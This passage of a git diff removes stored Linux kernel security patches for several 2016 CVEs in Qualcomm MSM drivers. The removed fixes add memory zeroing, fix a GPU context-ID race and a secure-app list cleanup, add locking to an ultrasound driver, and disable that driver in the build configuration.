-@@ -1470,6 +1474,7 @@ static int __from_user_hist_lut_data_v1_7(
- 		return -EFAULT;
- 	}
- 
-+	memset(&hist_lut_cfg_payload, 0, sizeof(hist_lut_cfg_payload));
- 	hist_lut_cfg_payload.len = hist_lut_cfg_payload32.len;
- 	hist_lut_cfg_payload.data = compat_ptr(hist_lut_cfg_payload32.data);
- 
-@@ -2024,6 +2029,7 @@ static int __from_user_pa_data_v1_7(
- 		return -EFAULT;
- 	}
- 
-+	memset(&pa_cfg_payload, 0, sizeof(pa_cfg_payload));
- 	pa_cfg_payload.mode = pa_cfg_payload32.mode;
- 	pa_cfg_payload.global_hue_adj = pa_cfg_payload32.global_hue_adj;
- 	pa_cfg_payload.global_sat_adj = pa_cfg_payload32.global_sat_adj;
-@@ -2280,6 +2286,8 @@ static int __from_user_gamut_cfg_data_v17(
- 		pr_err("failed to copy the gamut payload from userspace\n");
- 		return -EFAULT;
- 	}
-+
-+	memset(&gamut_cfg_payload, 0, sizeof(gamut_cfg_payload));
- 	gamut_cfg_payload.mode = gamut_cfg_payload32.mode;
- 	for (i = 0; i < MDP_GAMUT_TABLE_NUM_V1_7; i++) {
- 		gamut_cfg_payload.tbl_size[i] =
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8479/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2016-8479/3.18/0001.patch
deleted file mode 100644
index 55e0cb67..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8479/3.18/0001.patch
+++ /dev/null
@@ -1,88 +0,0 @@
-From 1a9d60a353d6c8191cfec089f8cb502626bb0b0e Mon Sep 17 00:00:00 2001
-From: Jordan Crouse <jcrouse@codeaurora.org>
-Date: Tue, 31 May 2016 11:24:22 -0600
-Subject: msm: kgsl: Reserve a context ID slot but don't populate immediately
-
-When creating a context allocate an ID but don't populate the slot
-with the context pointer until we are done setup up the rest of the
-process. This avoids a race if somebody tries to free the same
-identifier before the create operation is complete.
-
-Change-Id: Ic0dedbadca5b4cc4ce567afad48a33078b549439
-Signed-off-by: Jordan Crouse <jcrouse@codeaurora.org>
----
- drivers/gpu/msm/kgsl.c | 21 +++++++++++++--------
- 1 file changed, 13 insertions(+), 8 deletions(-)
-
-diff --git a/drivers/gpu/msm/kgsl.c b/drivers/gpu/msm/kgsl.c
-index ccd8a1d..61be1f339 100644
---- a/drivers/gpu/msm/kgsl.c
-+++ b/drivers/gpu/msm/kgsl.c
-@@ -525,21 +525,18 @@ void kgsl_context_dump(struct kgsl_context *context)
- EXPORT_SYMBOL(kgsl_context_dump);
- 
- /* Allocate a new context ID */
--static int _kgsl_get_context_id(struct kgsl_device *device,
--		struct kgsl_context *context)
-+static int _kgsl_get_context_id(struct kgsl_device *device)
- {
- 	int id;
- 
- 	idr_preload(GFP_KERNEL);
- 	write_lock(&device->context_lock);
--	id = idr_alloc(&device->context_idr, context, 1,
-+	/* Allocate the slot but don't put a pointer in it yet */
-+	id = idr_alloc(&device->context_idr, NULL, 1,
- 		KGSL_MEMSTORE_MAX, GFP_NOWAIT);
- 	write_unlock(&device->context_lock);
- 	idr_preload_end();
- 
--	if (id > 0)
--		context->id = id;
--
- 	return id;
- }
- 
-@@ -563,7 +560,7 @@ int kgsl_context_init(struct kgsl_device_private *dev_priv,
- 	char name[64];
- 	int ret = 0, id;
- 
--	id = _kgsl_get_context_id(device, context);
-+	id = _kgsl_get_context_id(device);
- 	if (id == -ENOSPC) {
- 		/*
- 		 * Before declaring that there are no contexts left try
-@@ -572,7 +569,7 @@ int kgsl_context_init(struct kgsl_device_private *dev_priv,
- 		 */
- 
- 		flush_workqueue(device->events_wq);
--		id = _kgsl_get_context_id(device, context);
-+		id = _kgsl_get_context_id(device);
- 	}
- 
- 	if (id < 0) {
-@@ -584,6 +581,8 @@ int kgsl_context_init(struct kgsl_device_private *dev_priv,
- 		return id;
- 	}
- 
-+	context->id = id;
-+
- 	kref_init(&context->refcount);
- 	/*
- 	 * Get a refernce to the process private so its not destroyed, until
-@@ -1713,6 +1712,12 @@ long kgsl_ioctl_drawctxt_create(struct kgsl_device_private *dev_priv,
- 		goto done;
- 	}
- 	trace_kgsl_context_create(dev_priv->device, context, param->flags);
-+
-+	/* Commit the pointer to the context in context_idr */
-+	write_lock(&device->context_lock);
-+	idr_replace(&device->context_idr, context, context->id);
-+	write_unlock(&device->context_lock);
-+
- 	param->drawctxt_id = context->id;
- done:
- 	return result;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8479/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2016-8479/4.4/0002.patch
deleted file mode 100644
index 7cb6476a..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8479/4.4/0002.patch
+++ /dev/null
@@ -1,89 +0,0 @@
-From eed663a48bec729bb66aaad18ab3fac3b7269581 Mon Sep 17 00:00:00 2001
-From: Jordan Crouse <jcrouse@codeaurora.org>
-Date: Tue, 31 May 2016 11:24:22 -0600
-Subject: msm: kgsl: Reserve a context ID slot but don't populate immediately
-
-When creating a context allocate an ID but don't populate the slot
-with the context pointer until we are done setup up the rest of the
-process. This avoids a race if somebody tries to free the same
-identifier before the create operation is complete.
-
-Change-Id: Ic0dedbadca5b4cc4ce567afad48a33078b549439
-Signed-off-by: Jordan Crouse <jcrouse@codeaurora.org>
-Signed-off-by: Dumpeti Sathish Kumar <sathyanov14@codeaurora.org>
----
- drivers/gpu/msm/kgsl.c | 21 +++++++++++++--------
- 1 file changed, 13 insertions(+), 8 deletions(-)
-
-diff --git a/drivers/gpu/msm/kgsl.c b/drivers/gpu/msm/kgsl.c
-index 699d996..e204478 100644
---- a/drivers/gpu/msm/kgsl.c
-+++ b/drivers/gpu/msm/kgsl.c
-@@ -491,21 +491,18 @@ void kgsl_context_dump(struct kgsl_context *context)
- EXPORT_SYMBOL(kgsl_context_dump);
- 
- /* Allocate a new context ID */
--static int _kgsl_get_context_id(struct kgsl_device *device,
--		struct kgsl_context *context)
-+static int _kgsl_get_context_id(struct kgsl_device *device)
- {
- 	int id;
- 
- 	idr_preload(GFP_KERNEL);
- 	write_lock(&device->context_lock);
--	id = idr_alloc(&device->context_idr, context, 1,
-+	/* Allocate the slot but don't put a pointer in it yet */
-+	id = idr_alloc(&device->context_idr, NULL, 1,
- 		KGSL_MEMSTORE_MAX, GFP_NOWAIT);
- 	write_unlock(&device->context_lock);
- 	idr_preload_end();
- 
--	if (id > 0)
--		context->id = id;
--
- 	return id;
- }
- 
-@@ -529,7 +526,7 @@ int kgsl_context_init(struct kgsl_device_private *dev_priv,
- 	char name[64];
- 	int ret = 0, id;
- 
--	id = _kgsl_get_context_id(device, context);
-+	id = _kgsl_get_context_id(device);
- 	if (id == -ENOSPC) {
- 		/*
- 		 * Before declaring that there are no contexts left try
-@@ -538,7 +535,7 @@ int kgsl_context_init(struct kgsl_device_private *dev_priv,
- 		 */
- 
- 		flush_workqueue(device->events_wq);
--		id = _kgsl_get_context_id(device, context);
-+		id = _kgsl_get_context_id(device);
- 	}
- 
- 	if (id < 0) {
-@@ -550,6 +547,8 @@ int kgsl_context_init(struct kgsl_device_private *dev_priv,
- 		return id;
- 	}
- 
-+	context->id = id;
-+
- 	kref_init(&context->refcount);
- 	/*
- 	 * Get a refernce to the process private so its not destroyed, until
-@@ -1733,6 +1732,12 @@ long kgsl_ioctl_drawctxt_create(struct kgsl_device_private *dev_priv,
- 		goto done;
- 	}
- 	trace_kgsl_context_create(dev_priv->device, context, param->flags);
-+
-+	/* Commit the pointer to the context in context_idr */
-+	write_lock(&device->context_lock);
-+	idr_replace(&device->context_idr, context, context->id);
-+	write_unlock(&device->context_lock);
-+
- 	param->drawctxt_id = context->id;
- done:
- 	return result;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8480/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-8480/3.10/0001.patch
deleted file mode 100644
index aebaeb00..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8480/3.10/0001.patch
+++ /dev/null
@@ -1,56 +0,0 @@
-From 0ed0f061bcd71940ed65de2ba46e37e709e31471 Mon Sep 17 00:00:00 2001
-From: Mallikarjuna Reddy Amireddy <mamire@codeaurora.org>
-Date: Tue, 22 Nov 2016 17:24:46 +0530
-Subject: qseecom: remove entry from qseecom_registered_app_list
-
-In an error handling case, the QSEECOM_IOCTL_LOAD_APP_REQ ioctl
-freed the entry for new TA, but didn't removed it from
-qseecom_registered_app_list. Make change to remove it.
-
-Change-Id: Id681fbf3c923027d3db875d506cbe3f971919a8d
-Signed-off-by: Zhen Kong <zkong@codeaurora.org>
-Signed-off-by: Mallikarjuna Reddy Amireddy <mamire@codeaurora.org>
----
- drivers/misc/qseecom.c | 11 ++++++++++-
- 1 file changed, 10 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index b1c97ba..270fb95 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -1349,6 +1349,7 @@ static int qseecom_load_app(struct qseecom_dev_handle *data, void __user *argp)
- 	struct qseecom_command_scm_resp resp;
- 	struct qseecom_check_app_ireq req;
- 	struct qseecom_load_app_ireq load_req;
-+	bool first_time = false;
- 
- 	/* Copy the relevant information needed for loading the image */
- 	if (copy_from_user(&load_img_req,
-@@ -1395,6 +1396,7 @@ static int qseecom_load_app(struct qseecom_dev_handle *data, void __user *argp)
- 		&qseecom.registered_app_list_lock, flags);
- 		ret = 0;
- 	} else {
-+		first_time = true;
- 		pr_warn("App (%s) does'nt exist, loading apps for first time\n",
- 			(char *)(load_img_req.img_name));
- 		/* Get the handle of the shared fd */
-@@ -1499,8 +1501,15 @@ static int qseecom_load_app(struct qseecom_dev_handle *data, void __user *argp)
- 	load_img_req.app_id = app_id;
- 	if (copy_to_user(argp, &load_img_req, sizeof(load_img_req))) {
- 		pr_err("copy_to_user failed\n");
--		kzfree(entry);
- 		ret = -EFAULT;
-+		if (first_time == true) {
-+			spin_lock_irqsave(
-+				&qseecom.registered_app_list_lock, flags);
-+			list_del(&entry->list);
-+			spin_unlock_irqrestore(
-+				&qseecom.registered_app_list_lock, flags);
-+			kzfree(entry);
-+		}
- 	}
- 
- loadapp_err:
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8480/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-8480/3.18/0002.patch
deleted file mode 100644
index fcb29892..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8480/3.18/0002.patch
+++ /dev/null
@@ -1,55 +0,0 @@
-From cd70f6025a7bbce89af7a7abf4c40a219fdea406 Mon Sep 17 00:00:00 2001
-From: Zhen Kong <zkong@codeaurora.org>
-Date: Fri, 4 Nov 2016 17:35:19 -0700
-Subject: qseecom: remove entry from qseecom_registered_app_list
-
-In an error handling case, the QSEECOM_IOCTL_LOAD_APP_REQ ioctl
-freed the entry for new TA, but didn't removed it from
-qseecom_registered_app_list. Make change to remove it.
-
-Change-Id: Id681fbf3c923027d3db875d506cbe3f971919a8d
-Signed-off-by: Zhen Kong <zkong@codeaurora.org>
----
- drivers/misc/qseecom.c | 11 ++++++++++-
- 1 file changed, 10 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index db603f0..e9ebbee 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -2183,6 +2183,7 @@ static int qseecom_load_app(struct qseecom_dev_handle *data, void __user *argp)
- 	struct qseecom_load_app_64bit_ireq load_req_64bit;
- 	void *cmd_buf = NULL;
- 	size_t cmd_len;
-+	bool first_time = false;
- 
- 	/* Copy the relevant information needed for loading the image */
- 	if (copy_from_user(&load_img_req,
-@@ -2254,6 +2255,7 @@ static int qseecom_load_app(struct qseecom_dev_handle *data, void __user *argp)
- 		&qseecom.registered_app_list_lock, flags);
- 		ret = 0;
- 	} else {
-+		first_time = true;
- 		pr_warn("App (%s) does'nt exist, loading apps for first time\n",
- 			(char *)(load_img_req.img_name));
- 		/* Get the handle of the shared fd */
-@@ -2385,8 +2387,15 @@ static int qseecom_load_app(struct qseecom_dev_handle *data, void __user *argp)
- 	load_img_req.app_id = app_id;
- 	if (copy_to_user(argp, &load_img_req, sizeof(load_img_req))) {
- 		pr_err("copy_to_user failed\n");
--		kzfree(entry);
- 		ret = -EFAULT;
-+		if (first_time == true) {
-+			spin_lock_irqsave(
-+				&qseecom.registered_app_list_lock, flags);
-+			list_del(&entry->list);
-+			spin_unlock_irqrestore(
-+				&qseecom.registered_app_list_lock, flags);
-+			kzfree(entry);
-+		}
- 	}
- 
- loadapp_err:
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8480/4.4/0003.patch b/Patches/Linux_CVEs/CVE-2016-8480/4.4/0003.patch
deleted file mode 100644
index 8a85ad8e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8480/4.4/0003.patch
+++ /dev/null
@@ -1,55 +0,0 @@
-From 420d51e0733e72830fa591f1e67f5a40ce11dc51 Mon Sep 17 00:00:00 2001
-From: Zhen Kong <zkong@codeaurora.org>
-Date: Fri, 4 Nov 2016 17:35:19 -0700
-Subject: qseecom: remove entry from qseecom_registered_app_list
-
-In an error handling case, the QSEECOM_IOCTL_LOAD_APP_REQ ioctl
-freed the entry for new TA, but didn't removed it from
-qseecom_registered_app_list. Make change to remove it.
-
-Change-Id: Id681fbf3c923027d3db875d506cbe3f971919a8d
-Signed-off-by: Zhen Kong <zkong@codeaurora.org>
----
- drivers/misc/qseecom.c | 11 ++++++++++-
- 1 file changed, 10 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index 3402a1b..249a76b 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -2071,6 +2071,7 @@ static int qseecom_load_app(struct qseecom_dev_handle *data, void __user *argp)
- 	struct qseecom_load_app_64bit_ireq load_req_64bit;
- 	void *cmd_buf = NULL;
- 	size_t cmd_len;
-+	bool first_time = false;
- 
- 	/* Copy the relevant information needed for loading the image */
- 	if (copy_from_user(&load_img_req,
-@@ -2142,6 +2143,7 @@ static int qseecom_load_app(struct qseecom_dev_handle *data, void __user *argp)
- 		&qseecom.registered_app_list_lock, flags);
- 		ret = 0;
- 	} else {
-+		first_time = true;
- 		pr_warn("App (%s) does'nt exist, loading apps for first time\n",
- 			(char *)(load_img_req.img_name));
- 		/* Get the handle of the shared fd */
-@@ -2273,8 +2275,15 @@ static int qseecom_load_app(struct qseecom_dev_handle *data, void __user *argp)
- 	load_img_req.app_id = app_id;
- 	if (copy_to_user(argp, &load_img_req, sizeof(load_img_req))) {
- 		pr_err("copy_to_user failed\n");
--		kzfree(entry);
- 		ret = -EFAULT;
-+		if (first_time == true) {
-+			spin_lock_irqsave(
-+				&qseecom.registered_app_list_lock, flags);
-+			list_del(&entry->list);
-+			spin_unlock_irqrestore(
-+				&qseecom.registered_app_list_lock, flags);
-+			kzfree(entry);
-+		}
- 	}
- 
- loadapp_err:
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8481/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2016-8481/4.4/0002.patch
deleted file mode 100644
index 3be89d8f..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8481/4.4/0002.patch
+++ /dev/null
@@ -1,185 +0,0 @@
-From c8c16b7406c68a5a9f35c5afbfcafd893e197425 Mon Sep 17 00:00:00 2001
-From: Sudheer Papothi <spapothi@codeaurora.org>
-Date: Wed, 26 Oct 2016 01:07:04 +0530
-Subject: drivers: qcom: ultrasound: Lock async driver calls
-
-Adds lock to ioctl and other external calls to driver.
-Adds missing null check in __usf_set_stream_param.
-
-Change-Id: I142f31c6bb46d6a394ad012077e1703875a120ad
-Signed-off-by: Sudheer Papothi <spapothi@codeaurora.org>
----
- drivers/misc/qcom/qdsp6v2/ultrasound/usf.c | 66 ++++++++++++++++++++++++++----
- 1 file changed, 59 insertions(+), 7 deletions(-)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/ultrasound/usf.c b/drivers/misc/qcom/qdsp6v2/ultrasound/usf.c
-index 7572374..3bb95f5 100644
---- a/drivers/misc/qcom/qdsp6v2/ultrasound/usf.c
-+++ b/drivers/misc/qcom/qdsp6v2/ultrasound/usf.c
-@@ -23,6 +23,7 @@
- #include <linux/time.h>
- #include <linux/kmemleak.h>
- #include <linux/wakelock.h>
-+#include <linux/mutex.h>
- #include <sound/apr_audio.h>
- #include <linux/qdsp6v2/usf.h>
- #include "q6usm.h"
-@@ -135,6 +136,8 @@ struct usf_type {
- 	uint16_t conflicting_event_filters;
- 	/* The requested buttons bitmap */
- 	uint16_t req_buttons_bitmap;
-+	/* Mutex for exclusive operations (all public APIs) */
-+	struct mutex mutex;
- };
- 
- struct usf_input_dev_type {
-@@ -1403,9 +1406,22 @@ static int __usf_set_stream_param(struct usf_xx_type *usf_xx,
- 				int dir)
- {
- 	struct us_client *usc = usf_xx->usc;
--	struct us_port_data *port = &usc->port[dir];
-+	struct us_port_data *port;
- 	int rc = 0;
- 
-+	if (usc == NULL) {
-+		pr_err("%s: usc is null\n",
-+			__func__);
-+		return -EFAULT;
-+	}
-+
-+	port = &usc->port[dir];
-+	if (port == NULL) {
-+		pr_err("%s: port is null\n",
-+			__func__);
-+		return -EFAULT;
-+	}
-+
- 	if (port->param_buf == NULL) {
- 		pr_err("%s: parameter buffer is null\n",
- 			__func__);
-@@ -1538,10 +1554,12 @@ static int usf_get_stream_param(struct usf_xx_type *usf_xx,
- 	return __usf_get_stream_param(usf_xx, &get_stream_param, dir);
- } /* usf_get_stream_param */
- 
--static long usf_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
-+static long __usf_ioctl(struct usf_type *usf,
-+		unsigned int cmd,
-+		unsigned long arg)
- {
-+
- 	int rc = 0;
--	struct usf_type *usf = file->private_data;
- 	struct usf_xx_type *usf_xx = NULL;
- 
- 	switch (cmd) {
-@@ -1704,6 +1722,18 @@ static long usf_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
- 		release_xx(usf_xx);
- 
- 	return rc;
-+} /* __usf_ioctl */
-+
-+static long usf_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
-+{
-+	struct usf_type *usf = file->private_data;
-+	int rc = 0;
-+
-+	mutex_lock(&usf->mutex);
-+	rc = __usf_ioctl(usf, cmd, arg);
-+	mutex_unlock(&usf->mutex);
-+
-+	return rc;
- } /* usf_ioctl */
- 
- #ifdef CONFIG_COMPAT
-@@ -2147,12 +2177,11 @@ static int usf_get_stream_param32(struct usf_xx_type *usf_xx,
- 	return __usf_get_stream_param(usf_xx, &get_stream_param, dir);
- } /* usf_get_stream_param32 */
- 
--static long usf_compat_ioctl(struct file *file,
-+static long __usf_compat_ioctl(struct usf_type *usf,
- 			     unsigned int cmd,
- 			     unsigned long arg)
- {
- 	int rc = 0;
--	struct usf_type *usf = file->private_data;
- 	struct usf_xx_type *usf_xx = NULL;
- 
- 	switch (cmd) {
-@@ -2160,7 +2189,7 @@ static long usf_compat_ioctl(struct file *file,
- 	case US_START_RX:
- 	case US_STOP_TX:
- 	case US_STOP_RX: {
--		return usf_ioctl(file, cmd, arg);
-+		return __usf_ioctl(usf, cmd, arg);
- 	}
- 
- 	case US_SET_TX_INFO32: {
-@@ -2269,6 +2298,20 @@ static long usf_compat_ioctl(struct file *file,
- 		release_xx(usf_xx);
- 
- 	return rc;
-+} /* __usf_compat_ioctl */
-+
-+static long usf_compat_ioctl(struct file *file,
-+			     unsigned int cmd,
-+			     unsigned long arg)
-+{
-+	struct usf_type *usf = file->private_data;
-+	int rc = 0;
-+
-+	mutex_lock(&usf->mutex);
-+	rc = __usf_compat_ioctl(usf, cmd, arg);
-+	mutex_unlock(&usf->mutex);
-+
-+	return rc;
- } /* usf_compat_ioctl */
- #endif /* CONFIG_COMPAT */
- 
-@@ -2277,13 +2320,17 @@ static int usf_mmap(struct file *file, struct vm_area_struct *vms)
- 	struct usf_type *usf = file->private_data;
- 	int dir = OUT;
- 	struct usf_xx_type *usf_xx = &usf->usf_tx;
-+	int rc = 0;
- 
-+	mutex_lock(&usf->mutex);
- 	if (vms->vm_flags & USF_VM_WRITE) { /* RX buf mapping */
- 		dir = IN;
- 		usf_xx = &usf->usf_rx;
- 	}
-+	rc = q6usm_get_virtual_address(dir, usf_xx->usc, vms);
-+	mutex_unlock(&usf->mutex);
- 
--	return q6usm_get_virtual_address(dir, usf_xx->usc, vms);
-+	return rc;
- }
- 
- static uint16_t add_opened_dev(int minor)
-@@ -2336,6 +2383,8 @@ static int usf_open(struct inode *inode, struct file *file)
- 	usf->usf_tx.us_detect_type = USF_US_DETECT_UNDEF;
- 	usf->usf_rx.us_detect_type = USF_US_DETECT_UNDEF;
- 
-+	mutex_init(&usf->mutex);
-+
- 	pr_debug("%s:usf in open\n", __func__);
- 	return 0;
- }
-@@ -2346,6 +2395,7 @@ static int usf_release(struct inode *inode, struct file *file)
- 
- 	pr_debug("%s: release entry\n", __func__);
- 
-+	mutex_lock(&usf->mutex);
- 	usf_release_input(usf);
- 
- 	usf_disable(&usf->usf_tx);
-@@ -2354,6 +2404,8 @@ static int usf_release(struct inode *inode, struct file *file)
- 	s_opened_devs[usf->dev_ind] = 0;
- 
- 	wakeup_source_trash(&usf_wakeup_source);
-+	mutex_unlock(&usf->mutex);
-+	mutex_destroy(&usf->mutex);
- 	kfree(usf);
- 	pr_debug("%s: release exit\n", __func__);
- 	return 0;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8481/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8481/ANY/0001.patch
deleted file mode 100644
index 5651b6b3..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8481/ANY/0001.patch
+++ /dev/null
@@ -1,185 +0,0 @@
-From ce9db0874906f6aedd80bb28d457eadfe38bdd02 Mon Sep 17 00:00:00 2001
-From: Sudheer Papothi <spapothi@codeaurora.org>
-Date: Wed, 26 Oct 2016 01:07:04 +0530
-Subject: drivers: qcom: ultrasound: Lock async driver calls
-
-Adds lock to ioctl and other external calls to driver.
-Adds missing null check in __usf_set_stream_param.
-
-Change-Id: I142f31c6bb46d6a394ad012077e1703875a120ad
-Signed-off-by: Sudheer Papothi <spapothi@codeaurora.org>
----
- drivers/misc/qcom/qdsp6v2/ultrasound/usf.c | 66 ++++++++++++++++++++++++++----
- 1 file changed, 59 insertions(+), 7 deletions(-)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/ultrasound/usf.c b/drivers/misc/qcom/qdsp6v2/ultrasound/usf.c
-index d535ccb..9270dbc 100644
---- a/drivers/misc/qcom/qdsp6v2/ultrasound/usf.c
-+++ b/drivers/misc/qcom/qdsp6v2/ultrasound/usf.c
-@@ -22,6 +22,7 @@
- #include <linux/uaccess.h>
- #include <linux/time.h>
- #include <linux/kmemleak.h>
-+#include <linux/mutex.h>
- #include <sound/apr_audio.h>
- #include <linux/qdsp6v2/usf.h>
- #include "q6usm.h"
-@@ -128,6 +129,8 @@ struct usf_type {
- 	uint16_t conflicting_event_filters;
- 	/* The requested buttons bitmap */
- 	uint16_t req_buttons_bitmap;
-+	/* Mutex for exclusive operations (all public APIs) */
-+	struct mutex mutex;
- };
- 
- struct usf_input_dev_type {
-@@ -1376,9 +1379,22 @@ static int __usf_set_stream_param(struct usf_xx_type *usf_xx,
- 				int dir)
- {
- 	struct us_client *usc = usf_xx->usc;
--	struct us_port_data *port = &usc->port[dir];
-+	struct us_port_data *port;
- 	int rc = 0;
- 
-+	if (usc == NULL) {
-+		pr_err("%s: usc is null\n",
-+			__func__);
-+		return -EFAULT;
-+	}
-+
-+	port = &usc->port[dir];
-+	if (port == NULL) {
-+		pr_err("%s: port is null\n",
-+			__func__);
-+		return -EFAULT;
-+	}
-+
- 	if (port->param_buf == NULL) {
- 		pr_err("%s: parameter buffer is null\n",
- 			__func__);
-@@ -1503,10 +1519,12 @@ static int usf_get_stream_param(struct usf_xx_type *usf_xx,
- 	return __usf_get_stream_param(usf_xx, &get_stream_param, dir);
- } /* usf_get_stream_param */
- 
--static long usf_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
-+static long __usf_ioctl(struct usf_type *usf,
-+		unsigned int cmd,
-+		unsigned long arg)
- {
-+
- 	int rc = 0;
--	struct usf_type *usf = file->private_data;
- 	struct usf_xx_type *usf_xx = NULL;
- 
- 	switch (cmd) {
-@@ -1669,6 +1687,18 @@ static long usf_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
- 		release_xx(usf_xx);
- 
- 	return rc;
-+} /* __usf_ioctl */
-+
-+static long usf_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
-+{
-+	struct usf_type *usf = file->private_data;
-+	int rc = 0;
-+
-+	mutex_lock(&usf->mutex);
-+	rc = __usf_ioctl(usf, cmd, arg);
-+	mutex_unlock(&usf->mutex);
-+
-+	return rc;
- } /* usf_ioctl */
- 
- #ifdef CONFIG_COMPAT
-@@ -2106,12 +2136,11 @@ static int usf_get_stream_param32(struct usf_xx_type *usf_xx,
- 	return __usf_get_stream_param(usf_xx, &get_stream_param, dir);
- } /* usf_get_stream_param32 */
- 
--static long usf_compat_ioctl(struct file *file,
-+static long __usf_compat_ioctl(struct usf_type *usf,
- 			     unsigned int cmd,
- 			     unsigned long arg)
- {
- 	int rc = 0;
--	struct usf_type *usf = file->private_data;
- 	struct usf_xx_type *usf_xx = NULL;
- 
- 	switch (cmd) {
-@@ -2119,7 +2148,7 @@ static long usf_compat_ioctl(struct file *file,
- 	case US_START_RX:
- 	case US_STOP_TX:
- 	case US_STOP_RX: {
--		return usf_ioctl(file, cmd, arg);
-+		return __usf_ioctl(usf, cmd, arg);
- 	}
- 
- 	case US_SET_TX_INFO32: {
-@@ -2228,6 +2257,20 @@ static long usf_compat_ioctl(struct file *file,
- 		release_xx(usf_xx);
- 
- 	return rc;
-+} /* __usf_compat_ioctl */
-+
-+static long usf_compat_ioctl(struct file *file,
-+			     unsigned int cmd,
-+			     unsigned long arg)
-+{
-+	struct usf_type *usf = file->private_data;
-+	int rc = 0;
-+
-+	mutex_lock(&usf->mutex);
-+	rc = __usf_compat_ioctl(usf, cmd, arg);
-+	mutex_unlock(&usf->mutex);
-+
-+	return rc;
- } /* usf_compat_ioctl */
- #endif /* CONFIG_COMPAT */
- 
-@@ -2236,13 +2279,17 @@ static int usf_mmap(struct file *file, struct vm_area_struct *vms)
- 	struct usf_type *usf = file->private_data;
- 	int dir = OUT;
- 	struct usf_xx_type *usf_xx = &usf->usf_tx;
-+	int rc = 0;
- 
-+	mutex_lock(&usf->mutex);
- 	if (vms->vm_flags & USF_VM_WRITE) { /* RX buf mapping */
- 		dir = IN;
- 		usf_xx = &usf->usf_rx;
- 	}
-+	rc = q6usm_get_virtual_address(dir, usf_xx->usc, vms);
-+	mutex_unlock(&usf->mutex);
- 
--	return q6usm_get_virtual_address(dir, usf_xx->usc, vms);
-+	return rc;
- }
- 
- static uint16_t add_opened_dev(int minor)
-@@ -2294,6 +2341,8 @@ static int usf_open(struct inode *inode, struct file *file)
- 	usf->usf_tx.us_detect_type = USF_US_DETECT_UNDEF;
- 	usf->usf_rx.us_detect_type = USF_US_DETECT_UNDEF;
- 
-+	mutex_init(&usf->mutex);
-+
- 	pr_debug("%s:usf in open\n", __func__);
- 	return 0;
- }
-@@ -2304,6 +2353,7 @@ static int usf_release(struct inode *inode, struct file *file)
- 
- 	pr_debug("%s: release entry\n", __func__);
- 
-+	mutex_lock(&usf->mutex);
- 	usf_release_input(usf);
- 
- 	usf_disable(&usf->usf_tx);
-@@ -2311,6 +2361,8 @@ static int usf_release(struct inode *inode, struct file *file)
- 
- 	s_opened_devs[usf->dev_ind] = 0;
- 
-+	mutex_unlock(&usf->mutex);
-+	mutex_destroy(&usf->mutex);
- 	kfree(usf);
- 	pr_debug("%s: release exit\n", __func__);
- 	return 0;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8481/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2016-8481/ANY/0003.patch
deleted file mode 100644
index ab99a331..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8481/ANY/0003.patch
+++ /dev/null
@@ -1,26 +0,0 @@
-From 831da5d113d214db6894e9fd0ce98762ee8a544a Mon Sep 17 00:00:00 2001
-From: Nick Desaulniers <ndesaulniers@google.com>
-Date: Tue, 6 Dec 2016 09:57:57 -0800
-Subject: [PATCH] Kconfig: msm: disable ultrasound driver
-
-Bug: 31906415
-Bug: 31906657
-Bug: 32553868
-Change-Id: Iab736a5d5622098c89c76dbe6b0b395652bbae57
-Signed-off-by: Nick Desaulniers <ndesaulniers@google.com>
----
- sound/soc/msm/Kconfig | 1 -
- 1 file changed, 1 deletion(-)
-
-diff --git a/sound/soc/msm/Kconfig b/sound/soc/msm/Kconfig
-index 6eb168e4d10d5..2e6f642241ef3 100644
---- a/sound/soc/msm/Kconfig
-+++ b/sound/soc/msm/Kconfig
-@@ -267,7 +267,6 @@ config SND_SOC_MSM8994
- 	select SND_SOC_MSM_HDMI_CODEC_RX
- 	select QTI_PP
- 	select SND_SOC_CPE
--	select MSM_ULTRASOUND
- 	select SND_HWDEP
- 	help
- 	 To add support for SoC audio on MSM8994.
diff --git a/Patches/Linux_CVEs/CVE-2016-8483/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8483/ANY/0001.patch
deleted file mode 100644
index 0b57e4dd..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8483/ANY/0001.patch
+++ /dev/null
